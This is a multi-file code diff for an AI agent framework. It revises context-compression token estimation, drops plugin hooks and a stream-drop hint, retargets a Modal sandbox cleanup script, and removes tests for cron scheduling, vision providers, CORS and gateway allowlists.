self._vprint(
|
||||
f"{self.log_prefix} 💡 The provider's stream "
|
||||
f"connection keeps dropping. This often happens "
|
||||
f"when the model tries to write a very large "
|
||||
f"file in a single tool call.",
|
||||
force=True,
|
||||
)
|
||||
self._vprint(
|
||||
f"{self.log_prefix} Try asking the model "
|
||||
f"to use execute_code with Python's open() for "
|
||||
f"large files, or to write the file in smaller "
|
||||
f"sections.",
|
||||
force=True,
|
||||
)
|
||||
|
||||
logging.error(
|
||||
"%sAPI call failed after %s retries. %s | provider=%s model=%s msgs=%s tokens=~%s",
|
||||
self.log_prefix, max_retries, _final_summary,
|
||||
@@ -7127,18 +6785,8 @@ class AIAgent:
|
||||
api_kwargs, reason="max_retries_exhausted", error=api_error,
|
||||
)
|
||||
self._persist_session(messages, conversation_history)
|
||||
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
|
||||
if _is_stream_drop:
|
||||
_final_response += (
|
||||
"\n\nThe provider's stream connection keeps "
|
||||
"dropping — this often happens when generating "
|
||||
"very large tool call responses (e.g. write_file "
|
||||
"with long content). Try asking me to use "
|
||||
"execute_code with Python's open() for large "
|
||||
"files, or to write in smaller sections."
|
||||
)
|
||||
return {
|
||||
"final_response": _final_response,
|
||||
"final_response": f"API call failed after {max_retries} retries: {_final_summary}",
|
||||
"messages": messages,
|
||||
"api_calls": api_call_count,
|
||||
"completed": False,
|
||||
@@ -7516,6 +7164,7 @@ class AIAgent:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
_msg_count_before_tools = len(messages)
|
||||
self._execute_tool_calls(assistant_message, messages, effective_task_id, api_call_count)
|
||||
|
||||
# Signal that a paragraph break is needed before the next
|
||||
@@ -7533,18 +7182,18 @@ class AIAgent:
|
||||
if _tc_names == {"execute_code"}:
|
||||
self.iteration_budget.refund()
|
||||
|
||||
# Use real token counts from the API response to decide
|
||||
# compression. prompt_tokens + completion_tokens is the
|
||||
# actual context size the provider reported plus the
|
||||
# assistant turn — a tight lower bound for the next prompt.
|
||||
# Tool results appended above aren't counted yet, but the
|
||||
# threshold (default 50%) leaves ample headroom; if tool
|
||||
# results push past it, the next API call will report the
|
||||
# real total and trigger compression then.
|
||||
# Estimate next prompt size using real token counts from the
|
||||
# last API response + rough estimate of newly appended tool
|
||||
# results. This catches cases where tool results push the
|
||||
# context past the limit that last_prompt_tokens alone misses
|
||||
# (e.g. large file reads, web extractions).
|
||||
_compressor = self.context_compressor
|
||||
_real_tokens = (
|
||||
_new_tool_msgs = messages[_msg_count_before_tools:]
|
||||
_new_chars = sum(len(str(m.get("content", "") or "")) for m in _new_tool_msgs)
|
||||
_estimated_next_prompt = (
|
||||
_compressor.last_prompt_tokens
|
||||
+ _compressor.last_completion_tokens
|
||||
+ _new_chars // 3 # conservative: JSON-heavy tool results ≈ 3 chars/token
|
||||
)
|
||||
|
||||
# ── Context pressure warnings (user-facing only) ──────────
|
||||
@@ -7554,12 +7203,12 @@ class AIAgent:
|
||||
# Does not inject into messages — just prints to CLI output
|
||||
# and fires status_callback for gateway platforms.
|
||||
if _compressor.threshold_tokens > 0:
|
||||
_compaction_progress = _real_tokens / _compressor.threshold_tokens
|
||||
_compaction_progress = _estimated_next_prompt / _compressor.threshold_tokens
|
||||
if _compaction_progress >= 0.85 and not self._context_pressure_warned:
|
||||
self._context_pressure_warned = True
|
||||
self._emit_context_pressure(_compaction_progress, _compressor)
|
||||
|
||||
if self.compression_enabled and _compressor.should_compress(_real_tokens):
|
||||
if self.compression_enabled and _compressor.should_compress(_estimated_next_prompt):
|
||||
messages, active_system_prompt = self._compress_context(
|
||||
messages, system_message,
|
||||
approx_tokens=self.context_compressor.last_prompt_tokens,
|
||||
@@ -7806,25 +7455,6 @@ class AIAgent:
|
||||
self._honcho_sync(original_user_message, final_response)
|
||||
self._queue_honcho_prefetch(original_user_message)
|
||||
|
||||
# Plugin hook: post_llm_call
|
||||
# Fired once per turn after the tool-calling loop completes.
|
||||
# Plugins can use this to persist conversation data (e.g. sync
|
||||
# to an external memory system).
|
||||
if final_response and not interrupted:
|
||||
try:
|
||||
from hermes_cli.plugins import invoke_hook as _invoke_hook
|
||||
_invoke_hook(
|
||||
"post_llm_call",
|
||||
session_id=self.session_id,
|
||||
user_message=original_user_message,
|
||||
assistant_response=final_response,
|
||||
conversation_history=list(messages),
|
||||
model=self.model,
|
||||
platform=getattr(self, "platform", None) or "",
|
||||
)
|
||||
except Exception as exc:
|
||||
logger.warning("post_llm_call hook failed: %s", exc)
|
||||
|
||||
# Extract reasoning from the last assistant message (if any)
|
||||
last_reasoning = None
|
||||
for msg in reversed(messages):
|
||||
@@ -7890,22 +7520,6 @@ class AIAgent:
|
||||
except Exception:
|
||||
pass # Background review is best-effort
|
||||
|
||||
# Plugin hook: on_session_end
|
||||
# Fired at the very end of every run_conversation call.
|
||||
# Plugins can use this for cleanup, flushing buffers, etc.
|
||||
try:
|
||||
from hermes_cli.plugins import invoke_hook as _invoke_hook
|
||||
_invoke_hook(
|
||||
"on_session_end",
|
||||
session_id=self.session_id,
|
||||
completed=completed,
|
||||
interrupted=interrupted,
|
||||
model=self.model,
|
||||
platform=getattr(self, "platform", None) or "",
|
||||
)
|
||||
except Exception as exc:
|
||||
logger.warning("on_session_end hook failed: %s", exc)
|
||||
|
||||
return result
|
||||
|
||||
def chat(self, message: str, stream_callback: Optional[callable] = None) -> str:
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
# Kill all running Modal apps (sandboxes, deployments, etc.)
|
||||
#
|
||||
# Usage:
|
||||
# bash scripts/kill_modal.sh # Stop hermes-agent sandboxes
|
||||
# bash scripts/kill_modal.sh # Stop swe-rex (the sandbox app)
|
||||
# bash scripts/kill_modal.sh --all # Stop ALL Modal apps
|
||||
|
||||
set -uo pipefail
|
||||
@@ -17,10 +17,10 @@ if [[ "${1:-}" == "--all" ]]; then
|
||||
modal app stop "$app_id" 2>/dev/null || true
|
||||
done
|
||||
else
|
||||
echo "Stopping hermes-agent sandboxes..."
|
||||
APPS=$(echo "$APP_LIST" | grep 'hermes-agent' | grep -oE 'ap-[A-Za-z0-9]+' || true)
|
||||
echo "Stopping swe-rex sandboxes..."
|
||||
APPS=$(echo "$APP_LIST" | grep 'swe-rex' | grep -oE 'ap-[A-Za-z0-9]+' || true)
|
||||
if [[ -z "$APPS" ]]; then
|
||||
echo " No hermes-agent apps found."
|
||||
echo " No swe-rex apps found."
|
||||
else
|
||||
echo "$APPS" | while read app_id; do
|
||||
echo " Stopping $app_id"
|
||||
@@ -30,5 +30,5 @@ else
|
||||
fi
|
||||
|
||||
echo ""
|
||||
echo "Current hermes-agent status:"
|
||||
modal app list 2>/dev/null | grep -E 'State|hermes-agent' || echo " (none)"
|
||||
echo "Current swe-rex status:"
|
||||
modal app list 2>/dev/null | grep -E 'State|swe-rex' || echo " (none)"
|
||||
|
||||
@@ -11,7 +11,6 @@ from agent.auxiliary_client import (
|
||||
get_text_auxiliary_client,
|
||||
get_vision_auxiliary_client,
|
||||
get_available_vision_backends,
|
||||
resolve_vision_provider_client,
|
||||
resolve_provider_client,
|
||||
auxiliary_max_tokens_param,
|
||||
_read_codex_access_token,
|
||||
@@ -639,30 +638,6 @@ class TestVisionClientFallback:
|
||||
assert client.__class__.__name__ == "AnthropicAuxiliaryClient"
|
||||
assert model == "claude-haiku-4-5-20251001"
|
||||
|
||||
def test_selected_codex_provider_short_circuits_vision_auto(self, monkeypatch):
|
||||
def fake_load_config():
|
||||
return {"model": {"provider": "openai-codex", "default": "gpt-5.2-codex"}}
|
||||
|
||||
codex_client = MagicMock()
|
||||
with (
|
||||
patch("hermes_cli.config.load_config", fake_load_config),
|
||||
patch("agent.auxiliary_client._try_codex", return_value=(codex_client, "gpt-5.2-codex")) as mock_codex,
|
||||
patch("agent.auxiliary_client._try_openrouter") as mock_openrouter,
|
||||
patch("agent.auxiliary_client._try_nous") as mock_nous,
|
||||
patch("agent.auxiliary_client._try_anthropic") as mock_anthropic,
|
||||
patch("agent.auxiliary_client._try_custom_endpoint") as mock_custom,
|
||||
):
|
||||
provider, client, model = resolve_vision_provider_client()
|
||||
|
||||
assert provider == "openai-codex"
|
||||
assert client is codex_client
|
||||
assert model == "gpt-5.2-codex"
|
||||
mock_codex.assert_called_once()
|
||||
mock_openrouter.assert_not_called()
|
||||
mock_nous.assert_not_called()
|
||||
mock_anthropic.assert_not_called()
|
||||
mock_custom.assert_not_called()
|
||||
|
||||
def test_vision_auto_includes_codex(self, codex_auth_dir):
|
||||
"""Codex supports vision (gpt-5.3-codex), so auto mode should use it."""
|
||||
with patch("agent.auxiliary_client._read_nous_auth", return_value=None), \
|
||||
|
||||
@@ -18,8 +18,6 @@ from agent.prompt_builder import (
|
||||
build_context_files_prompt,
|
||||
CONTEXT_FILE_MAX_CHARS,
|
||||
DEFAULT_AGENT_IDENTITY,
|
||||
TOOL_USE_ENFORCEMENT_GUIDANCE,
|
||||
TOOL_USE_ENFORCEMENT_MODELS,
|
||||
MEMORY_GUIDANCE,
|
||||
SESSION_SEARCH_GUIDANCE,
|
||||
PLATFORM_HINTS,
|
||||
@@ -234,18 +232,7 @@ class TestPromptBuilderImports:
|
||||
# =========================================================================
|
||||
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
class TestBuildSkillsSystemPrompt:
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_skills_cache(self):
|
||||
"""Ensure the in-process skills prompt cache doesn't leak between tests."""
|
||||
from agent.prompt_builder import clear_skills_system_prompt_cache
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
yield
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
|
||||
def test_empty_when_no_skills_dir(self, monkeypatch, tmp_path):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
result = build_skills_system_prompt()
|
||||
@@ -315,7 +302,7 @@ class TestBuildSkillsSystemPrompt:
|
||||
|
||||
from unittest.mock import patch
|
||||
|
||||
with patch("agent.skill_utils.sys") as mock_sys:
|
||||
with patch("tools.skills_tool.sys") as mock_sys:
|
||||
mock_sys.platform = "darwin"
|
||||
result = build_skills_system_prompt()
|
||||
|
||||
@@ -343,7 +330,7 @@ class TestBuildSkillsSystemPrompt:
|
||||
from unittest.mock import patch
|
||||
|
||||
with patch(
|
||||
"agent.prompt_builder.get_disabled_skill_names",
|
||||
"tools.skills_tool._get_disabled_skill_names",
|
||||
return_value={"old-tool"},
|
||||
):
|
||||
result = build_skills_system_prompt()
|
||||
@@ -817,13 +804,6 @@ class TestSkillShouldShow:
|
||||
|
||||
|
||||
class TestBuildSkillsSystemPromptConditional:
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_skills_cache(self):
|
||||
from agent.prompt_builder import clear_skills_system_prompt_cache
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
yield
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
|
||||
def test_fallback_skill_hidden_when_primary_available(self, monkeypatch, tmp_path):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
skill_dir = tmp_path / "skills" / "search" / "duckduckgo"
|
||||
@@ -928,98 +908,3 @@ class TestBuildSkillsSystemPromptConditional:
|
||||
available_toolsets=set(),
|
||||
)
|
||||
assert "nested-null" in result
|
||||
|
||||
|
||||
# =========================================================================
|
||||
# Tool-use enforcement guidance
|
||||
# =========================================================================
|
||||
|
||||
|
||||
class TestToolUseEnforcementGuidance:
|
||||
def test_guidance_mentions_tool_calls(self):
|
||||
assert "tool call" in TOOL_USE_ENFORCEMENT_GUIDANCE.lower()
|
||||
|
||||
def test_guidance_forbids_description_only(self):
|
||||
assert "describe" in TOOL_USE_ENFORCEMENT_GUIDANCE.lower()
|
||||
assert "promise" in TOOL_USE_ENFORCEMENT_GUIDANCE.lower()
|
||||
|
||||
def test_guidance_requires_action(self):
|
||||
assert "MUST" in TOOL_USE_ENFORCEMENT_GUIDANCE
|
||||
|
||||
def test_enforcement_models_includes_gpt(self):
|
||||
assert "gpt" in TOOL_USE_ENFORCEMENT_MODELS
|
||||
|
||||
def test_enforcement_models_includes_codex(self):
|
||||
assert "codex" in TOOL_USE_ENFORCEMENT_MODELS
|
||||
|
||||
def test_enforcement_models_is_tuple(self):
|
||||
assert isinstance(TOOL_USE_ENFORCEMENT_MODELS, tuple)
|
||||
|
||||
|
||||
# =========================================================================
|
||||
# Budget warning history stripping
|
||||
# =========================================================================
|
||||
|
||||
|
||||
class TestStripBudgetWarningsFromHistory:
|
||||
def test_strips_json_budget_warning_key(self):
|
||||
import json
|
||||
from run_agent import _strip_budget_warnings_from_history
|
||||
|
||||
messages = [
|
||||
{"role": "tool", "tool_call_id": "c1", "content": json.dumps({
|
||||
"output": "hello",
|
||||
"exit_code": 0,
|
||||
"_budget_warning": "[BUDGET: Iteration 55/60. 5 iterations left. Start consolidating your work.]",
|
||||
})},
|
||||
]
|
||||
_strip_budget_warnings_from_history(messages)
|
||||
parsed = json.loads(messages[0]["content"])
|
||||
assert "_budget_warning" not in parsed
|
||||
assert parsed["output"] == "hello"
|
||||
assert parsed["exit_code"] == 0
|
||||
|
||||
def test_strips_text_budget_warning(self):
|
||||
from run_agent import _strip_budget_warnings_from_history
|
||||
|
||||
messages = [
|
||||
{"role": "tool", "tool_call_id": "c1",
|
||||
"content": "some result\n\n[BUDGET WARNING: Iteration 58/60. Only 2 iteration(s) left. Provide your final response NOW. No more tool calls unless absolutely critical.]"},
|
||||
]
|
||||
_strip_budget_warnings_from_history(messages)
|
||||
assert messages[0]["content"] == "some result"
|
||||
|
||||
def test_leaves_non_tool_messages_unchanged(self):
|
||||
from run_agent import _strip_budget_warnings_from_history
|
||||
|
||||
messages = [
|
||||
{"role": "assistant", "content": "[BUDGET WARNING: Iteration 58/60. Only 2 iteration(s) left. Provide your final response NOW. No more tool calls unless absolutely critical.]"},
|
||||
{"role": "user", "content": "hello"},
|
||||
]
|
||||
original_contents = [m["content"] for m in messages]
|
||||
_strip_budget_warnings_from_history(messages)
|
||||
assert [m["content"] for m in messages] == original_contents
|
||||
|
||||
def test_handles_empty_and_missing_content(self):
|
||||
from run_agent import _strip_budget_warnings_from_history
|
||||
|
||||
messages = [
|
||||
{"role": "tool", "tool_call_id": "c1", "content": ""},
|
||||
{"role": "tool", "tool_call_id": "c2"},
|
||||
]
|
||||
_strip_budget_warnings_from_history(messages)
|
||||
assert messages[0]["content"] == ""
|
||||
|
||||
def test_strips_caution_variant(self):
|
||||
import json
|
||||
from run_agent import _strip_budget_warnings_from_history
|
||||
|
||||
messages = [
|
||||
{"role": "tool", "tool_call_id": "c1", "content": json.dumps({
|
||||
"output": "ok",
|
||||
"_budget_warning": "[BUDGET: Iteration 42/60. 18 iterations left. Start consolidating your work.]",
|
||||
})},
|
||||
]
|
||||
_strip_budget_warnings_from_history(messages)
|
||||
parsed = json.loads(messages[0]["content"])
|
||||
assert "_budget_warning" not in parsed
|
||||
|
||||
@@ -54,7 +54,7 @@ class TestScanSkillCommands:
|
||||
"""macOS-only skills should not register slash commands on Linux."""
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
mock_sys.platform = "linux"
|
||||
_make_skill(tmp_path, "imessage", frontmatter_extra="platforms: [macos]\n")
|
||||
@@ -67,7 +67,7 @@ class TestScanSkillCommands:
|
||||
"""macOS-only skills should register slash commands on macOS."""
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
mock_sys.platform = "darwin"
|
||||
_make_skill(tmp_path, "imessage", frontmatter_extra="platforms: [macos]\n")
|
||||
@@ -78,7 +78,7 @@ class TestScanSkillCommands:
|
||||
"""Skills without platforms field should register on any platform."""
|
||||
with (
|
||||
patch("tools.skills_tool.SKILLS_DIR", tmp_path),
|
||||
patch("agent.skill_utils.sys") as mock_sys,
|
||||
patch("tools.skills_tool.sys") as mock_sys,
|
||||
):
|
||||
mock_sys.platform = "win32"
|
||||
_make_skill(tmp_path, "generic-tool")
|
||||
|
||||
@@ -20,7 +20,6 @@ from cron.jobs import (
|
||||
resume_job,
|
||||
remove_job,
|
||||
mark_job_run,
|
||||
advance_next_run,
|
||||
get_due_jobs,
|
||||
save_job_output,
|
||||
)
|
||||
@@ -340,90 +339,6 @@ class TestMarkJobRun:
|
||||
assert updated["last_error"] == "timeout"
|
||||
|
||||
|
||||
class TestAdvanceNextRun:
|
||||
"""Tests for advance_next_run() — crash-safety for recurring jobs."""
|
||||
|
||||
def test_advances_interval_job(self, tmp_cron_dir):
|
||||
"""Interval jobs should have next_run_at bumped to the next future occurrence."""
|
||||
job = create_job(prompt="Recurring check", schedule="every 1h")
|
||||
# Force next_run_at to 5 minutes ago (i.e. the job is due)
|
||||
jobs = load_jobs()
|
||||
old_next = (datetime.now() - timedelta(minutes=5)).isoformat()
|
||||
jobs[0]["next_run_at"] = old_next
|
||||
save_jobs(jobs)
|
||||
|
||||
result = advance_next_run(job["id"])
|
||||
assert result is True
|
||||
|
||||
updated = get_job(job["id"])
|
||||
from cron.jobs import _ensure_aware, _hermes_now
|
||||
new_next_dt = _ensure_aware(datetime.fromisoformat(updated["next_run_at"]))
|
||||
assert new_next_dt > _hermes_now(), "next_run_at should be in the future after advance"
|
||||
|
||||
def test_advances_cron_job(self, tmp_cron_dir):
|
||||
"""Cron-expression jobs should have next_run_at bumped to the next occurrence."""
|
||||
pytest.importorskip("croniter")
|
||||
job = create_job(prompt="Daily wakeup", schedule="15 6 * * *")
|
||||
# Force next_run_at to 30 minutes ago
|
||||
jobs = load_jobs()
|
||||
old_next = (datetime.now() - timedelta(minutes=30)).isoformat()
|
||||
jobs[0]["next_run_at"] = old_next
|
||||
save_jobs(jobs)
|
||||
|
||||
result = advance_next_run(job["id"])
|
||||
assert result is True
|
||||
|
||||
updated = get_job(job["id"])
|
||||
from cron.jobs import _ensure_aware, _hermes_now
|
||||
new_next_dt = _ensure_aware(datetime.fromisoformat(updated["next_run_at"]))
|
||||
assert new_next_dt > _hermes_now(), "next_run_at should be in the future after advance"
|
||||
|
||||
def test_skips_oneshot_job(self, tmp_cron_dir):
|
||||
"""One-shot jobs should NOT be advanced — they need to retry on restart."""
|
||||
job = create_job(prompt="Run once", schedule="30m")
|
||||
original_next = get_job(job["id"])["next_run_at"]
|
||||
|
||||
result = advance_next_run(job["id"])
|
||||
assert result is False
|
||||
|
||||
updated = get_job(job["id"])
|
||||
assert updated["next_run_at"] == original_next, "one-shot next_run_at should be unchanged"
|
||||
|
||||
def test_nonexistent_job_returns_false(self, tmp_cron_dir):
|
||||
result = advance_next_run("nonexistent-id")
|
||||
assert result is False
|
||||
|
||||
def test_already_future_stays_future(self, tmp_cron_dir):
|
||||
"""If next_run_at is already in the future, advance keeps it in the future (no harm)."""
|
||||
job = create_job(prompt="Future job", schedule="every 1h")
|
||||
# next_run_at is already set to ~1h from now by create_job
|
||||
advance_next_run(job["id"])
|
||||
# Regardless of return value, the job should still be in the future
|
||||
updated = get_job(job["id"])
|
||||
from cron.jobs import _ensure_aware, _hermes_now
|
||||
new_next_dt = _ensure_aware(datetime.fromisoformat(updated["next_run_at"]))
|
||||
assert new_next_dt > _hermes_now(), "next_run_at should remain in the future"
|
||||
|
||||
def test_crash_safety_scenario(self, tmp_cron_dir):
|
||||
"""Simulate the crash-loop scenario: after advance, the job should NOT be due."""
|
||||
job = create_job(prompt="Crash test", schedule="every 1h")
|
||||
# Force next_run_at to 5 minutes ago (job is due)
|
||||
jobs = load_jobs()
|
||||
jobs[0]["next_run_at"] = (datetime.now() - timedelta(minutes=5)).isoformat()
|
||||
save_jobs(jobs)
|
||||
|
||||
# Job should be due before advance
|
||||
due_before = get_due_jobs()
|
||||
assert len(due_before) == 1
|
||||
|
||||
# Advance (simulating what tick() does before run_job)
|
||||
advance_next_run(job["id"])
|
||||
|
||||
# Now the job should NOT be due (simulates restart after crash)
|
||||
due_after = get_due_jobs()
|
||||
assert len(due_after) == 0, "Job should not be due after advance_next_run"
|
||||
|
||||
|
||||
class TestGetDueJobs:
|
||||
def test_past_due_within_window_returned(self, tmp_cron_dir):
|
||||
"""Jobs within the dynamic grace window are still considered due (not stale).
|
||||
|
||||
@@ -687,41 +687,3 @@ class TestBuildJobPromptMissingSkill:
|
||||
result = _build_job_prompt({"skills": ["ghost-skill", "real-skill"], "prompt": "go"})
|
||||
assert "Real skill content." in result
|
||||
assert "go" in result
|
||||
|
||||
|
||||
class TestTickAdvanceBeforeRun:
|
||||
"""Verify that tick() calls advance_next_run before run_job for crash safety."""
|
||||
|
||||
def test_advance_called_before_run_job(self, tmp_path):
|
||||
"""advance_next_run must be called before run_job to prevent crash-loop re-fires."""
|
||||
call_order = []
|
||||
|
||||
def fake_advance(job_id):
|
||||
call_order.append(("advance", job_id))
|
||||
return True
|
||||
|
||||
def fake_run_job(job):
|
||||
call_order.append(("run", job["id"]))
|
||||
return True, "output", "response", None
|
||||
|
||||
fake_job = {
|
||||
"id": "test-advance",
|
||||
"name": "test",
|
||||
"prompt": "hello",
|
||||
"enabled": True,
|
||||
"schedule": {"kind": "cron", "expr": "15 6 * * *"},
|
||||
}
|
||||
|
||||
with patch("cron.scheduler.get_due_jobs", return_value=[fake_job]), \
|
||||
patch("cron.scheduler.advance_next_run", side_effect=fake_advance) as adv_mock, \
|
||||
patch("cron.scheduler.run_job", side_effect=fake_run_job), \
|
||||
patch("cron.scheduler.save_job_output", return_value=tmp_path / "out.md"), \
|
||||
patch("cron.scheduler.mark_job_run"), \
|
||||
patch("cron.scheduler._deliver_result"):
|
||||
from cron.scheduler import tick
|
||||
executed = tick(verbose=False)
|
||||
|
||||
assert executed == 1
|
||||
adv_mock.assert_called_once_with("test-advance")
|
||||
# advance must happen before run
|
||||
assert call_order == [("advance", "test-advance"), ("run", "test-advance")]
|
||||
|
||||
@@ -1,46 +0,0 @@
|
||||
"""Tests for the startup allowlist warning check in gateway/run.py."""
|
||||
|
||||
import os
|
||||
from unittest.mock import patch
|
||||
|
||||
|
||||
def _would_warn():
|
||||
"""Replicate the startup allowlist warning logic. Returns True if warning fires."""
|
||||
_any_allowlist = any(
|
||||
os.getenv(v)
|
||||
for v in ("TELEGRAM_ALLOWED_USERS", "DISCORD_ALLOWED_USERS",
|
||||
"WHATSAPP_ALLOWED_USERS", "SLACK_ALLOWED_USERS",
|
||||
"SIGNAL_ALLOWED_USERS", "SIGNAL_GROUP_ALLOWED_USERS",
|
||||
"EMAIL_ALLOWED_USERS",
|
||||
"SMS_ALLOWED_USERS", "MATTERMOST_ALLOWED_USERS",
|
||||
"MATRIX_ALLOWED_USERS", "DINGTALK_ALLOWED_USERS",
|
||||
"GATEWAY_ALLOWED_USERS")
|
||||
)
|
||||
_allow_all = os.getenv("GATEWAY_ALLOW_ALL_USERS", "").lower() in ("true", "1", "yes") or any(
|
||||
os.getenv(v, "").lower() in ("true", "1", "yes")
|
||||
for v in ("TELEGRAM_ALLOW_ALL_USERS", "DISCORD_ALLOW_ALL_USERS",
|
||||
"WHATSAPP_ALLOW_ALL_USERS", "SLACK_ALLOW_ALL_USERS",
|
||||
"SIGNAL_ALLOW_ALL_USERS", "EMAIL_ALLOW_ALL_USERS",
|
||||
"SMS_ALLOW_ALL_USERS", "MATTERMOST_ALLOW_ALL_USERS",
|
||||
"MATRIX_ALLOW_ALL_USERS", "DINGTALK_ALLOW_ALL_USERS")
|
||||
)
|
||||
return not _any_allowlist and not _allow_all
|
||||
|
||||
|
||||
class TestAllowlistStartupCheck:
|
||||
|
||||
def test_no_config_emits_warning(self):
|
||||
with patch.dict(os.environ, {}, clear=True):
|
||||
assert _would_warn() is True
|
||||
|
||||
def test_signal_group_allowed_users_suppresses_warning(self):
|
||||
with patch.dict(os.environ, {"SIGNAL_GROUP_ALLOWED_USERS": "user1"}, clear=True):
|
||||
assert _would_warn() is False
|
||||
|
||||
def test_telegram_allow_all_users_suppresses_warning(self):
|
||||
with patch.dict(os.environ, {"TELEGRAM_ALLOW_ALL_USERS": "true"}, clear=True):
|
||||
assert _would_warn() is False
|
||||
|
||||
def test_gateway_allow_all_users_suppresses_warning(self):
|
||||
with patch.dict(os.environ, {"GATEWAY_ALLOW_ALL_USERS": "yes"}, clear=True):
|
||||
assert _would_warn() is False
|
||||
@@ -1300,31 +1300,6 @@ class TestCORS:
|
||||
assert "POST" in resp.headers.get("Access-Control-Allow-Methods", "")
|
||||
assert "DELETE" in resp.headers.get("Access-Control-Allow-Methods", "")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_cors_allows_idempotency_key_header(self):
|
||||
adapter = _make_adapter(cors_origins=["http://localhost:3000"])
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
resp = await cli.options(
|
||||
"/v1/chat/completions",
|
||||
headers={
|
||||
"Origin": "http://localhost:3000",
|
||||
"Access-Control-Request-Method": "POST",
|
||||
"Access-Control-Request-Headers": "Idempotency-Key",
|
||||
},
|
||||
)
|
||||
assert resp.status == 200
|
||||
assert "Idempotency-Key" in resp.headers.get("Access-Control-Allow-Headers", "")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_cors_sets_vary_origin_header(self):
|
||||
adapter = _make_adapter(cors_origins=["http://localhost:3000"])
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
resp = await cli.get("/health", headers={"Origin": "http://localhost:3000"})
|
||||
assert resp.status == 200
|
||||
assert resp.headers.get("Vary") == "Origin"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_cors_options_preflight_allowed_for_configured_origin(self):
|
||||
"""Configured origins can complete browser preflight."""
|
||||
|
||||
@@ -69,8 +69,7 @@ class TestApiServerPlatformConfig:
|
||||
|
||||
class TestApiServerAdapterToolset:
|
||||
@patch("gateway.platforms.api_server.AIOHTTP_AVAILABLE", True)
|
||||
def test_create_agent_reads_config_toolsets(self):
|
||||
"""API server resolves toolsets from config like all other platforms."""
|
||||
def test_create_agent_uses_api_server_toolset(self):
|
||||
from gateway.platforms.api_server import APIServerAdapter
|
||||
from gateway.config import PlatformConfig
|
||||
|
||||
@@ -78,52 +77,17 @@ class TestApiServerAdapterToolset:
|
||||
|
||||
with patch("gateway.run._resolve_runtime_agent_kwargs") as mock_kwargs, \
|
||||
patch("gateway.run._resolve_gateway_model") as mock_model, \
|
||||
patch("gateway.run._load_gateway_config") as mock_config, \
|
||||
patch("run_agent.AIAgent") as mock_agent_cls:
|
||||
|
||||
mock_kwargs.return_value = {"api_key": "test-key", "base_url": None,
|
||||
"provider": None, "api_mode": None,
|
||||
"command": None, "args": []}
|
||||
mock_model.return_value = "test/model"
|
||||
# No platform_toolsets override — should fall back to hermes-api-server default
|
||||
mock_config.return_value = {}
|
||||
mock_agent_cls.return_value = MagicMock()
|
||||
|
||||
adapter._create_agent()
|
||||
|
||||
mock_agent_cls.assert_called_once()
|
||||
call_kwargs = mock_agent_cls.call_args
|
||||
toolsets = call_kwargs.kwargs.get("enabled_toolsets")
|
||||
assert isinstance(toolsets, list)
|
||||
assert len(toolsets) > 0
|
||||
assert call_kwargs.kwargs.get("enabled_toolsets") == ["hermes-api-server"]
|
||||
assert call_kwargs.kwargs.get("platform") == "api_server"
|
||||
|
||||
@patch("gateway.platforms.api_server.AIOHTTP_AVAILABLE", True)
|
||||
def test_create_agent_respects_config_override(self):
|
||||
"""User can override API server toolsets via platform_toolsets in config.yaml."""
|
||||
from gateway.platforms.api_server import APIServerAdapter
|
||||
from gateway.config import PlatformConfig
|
||||
|
||||
adapter = APIServerAdapter(PlatformConfig())
|
||||
|
||||
with patch("gateway.run._resolve_runtime_agent_kwargs") as mock_kwargs, \
|
||||
patch("gateway.run._resolve_gateway_model") as mock_model, \
|
||||
patch("gateway.run._load_gateway_config") as mock_config, \
|
||||
patch("run_agent.AIAgent") as mock_agent_cls:
|
||||
|
||||
mock_kwargs.return_value = {"api_key": "test-key", "base_url": None,
|
||||
"provider": None, "api_mode": None,
|
||||
"command": None, "args": []}
|
||||
mock_model.return_value = "test/model"
|
||||
# User overrides with just web and terminal
|
||||
mock_config.return_value = {
|
||||
"platform_toolsets": {"api_server": ["web", "terminal"]}
|
||||
}
|
||||
mock_agent_cls.return_value = MagicMock()
|
||||
|
||||
adapter._create_agent()
|
||||
|
||||
mock_agent_cls.assert_called_once()
|
||||
call_kwargs = mock_agent_cls.call_args
|
||||
toolsets = call_kwargs.kwargs.get("enabled_toolsets")
|
||||
assert sorted(toolsets) == ["terminal", "web"]
|
||||
|
||||
@@ -32,7 +32,7 @@ def _ensure_telegram_mock():
|
||||
telegram_mod.constants.ChatType.CHANNEL = "channel"
|
||||
telegram_mod.constants.ChatType.PRIVATE = "private"
|
||||
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
|
||||
@@ -7,21 +7,11 @@ Verifies that:
|
||||
3. The flush still works normally when memory files don't exist
|
||||
"""
|
||||
|
||||
import sys
|
||||
import types
|
||||
import pytest
|
||||
from pathlib import Path
|
||||
from unittest.mock import MagicMock, patch, call
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _mock_dotenv(monkeypatch):
|
||||
"""gateway.run imports dotenv at module level; stub it so tests run without the package."""
|
||||
fake = types.ModuleType("dotenv")
|
